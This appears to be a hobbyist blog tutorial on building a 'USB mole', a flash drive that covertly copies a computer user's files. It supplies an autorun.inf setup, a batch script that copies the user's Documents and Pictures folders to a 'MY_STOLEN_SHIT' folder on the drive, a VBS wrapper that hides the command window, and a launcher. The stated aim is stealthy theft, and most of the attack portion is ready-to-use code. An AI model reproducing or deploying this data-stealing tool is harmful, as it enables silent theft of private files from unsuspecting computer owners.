Top Secret USB Mole

One of my favorite gadgets in movies is the USB that steals info from a machine, in stealth mode.
I guess some of you already have this, so did I, but I decided to make a short tutorial for those interested.


Open up your favorite text editor (notepad will do!), copy these lines:

action=Click OK to Run 
Now save this as autorun.inf

You can change the icon to whatever you want, but make sure you save the .ico file in the main root of the USB, and in case it?s a different name make sure you change it in the autorun file, ej. Myicon.ico (don’t use spaces) This is optional.

The “action=” command is also optional. When the autorun launches it may ask the user what to open, so this line will place in writing ?click Ok or run?.

This is a backup just in case the user is asked what to open, but if you are the one operating the machine, it is not necessary.

The “shell/open command” also acts as a backup in case the user clicks cancel instead of open when prompted. This code will execute when the drive letter is clicked on.


Open Notepad again, now copy this:

@echo off 
:: variables 
SET odrive=%odrive:~0,2% 
set backupcmd=xcopy /s /c /d /e /h /i /r /y 
echo off 
%backupcmd% "%USERPROFILE%\documents" "%drive%\MY_STOLEN_SHIT\DOCS" 
%backupcmd% "%USERPROFILE%\pictures" "%drive%\MY_STOLEN_SHIT\PICS"
@echo off 
Save this as file.bat

This file will copy the contents of the current users documents and pictures folder to the drive under a folder called “MY_STOLEN_SHIT”. This is the section of the code you will need to edit depending on what you want to copy and where.

The first file path "%USERPROFILE%\documents" – is the target.
The second file path "%drive%\MY_STOLEN_SHIT\PICS" – is the destination.


Open Notepad again, and paste this:

CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
Save this as invisible.vbs

This code runs the file.bat as a process so it does not show the CMD prompt and everything the batch file is processing.


Open Notepad again, last one, and paste this:

wscript.exe \invisible.vbs file.bat
Save as launch.bat

This does two things, it looks for the invisible.vbs file in the root of the Flash drive then loads it with file.bat so file.bat is run with code from vbs file.


Now finally copy all the files you have created and paste them in the root of your USB, also the icon file. Create a folder called ?MY_STOLEN_SHIT? or whatever you want, but be sure to change the destination name in the code in case you call your folder something else.

And Voila! Now test it and wait for the magic to happen.

In case you use it in a machine that sucks with autorun, you can simply open your USB drive and manually run launch.bat, this is in a worst case scenario since it rarely happens, but you never know.

Good Luck!

cotufa-ssdd Reviewed by cotufa-ssdd on . Top Secret USB Mole Top Secret USB Mole One of my favorite gadgets in movies is the USB that steals info from a machine, in stealth mode. I guess some of you already have this, so did I, but I decided to make a short tutorial for those interested. STEP 1 Open up your favorite text editor (notepad will do!), copy these lines: Rating: 5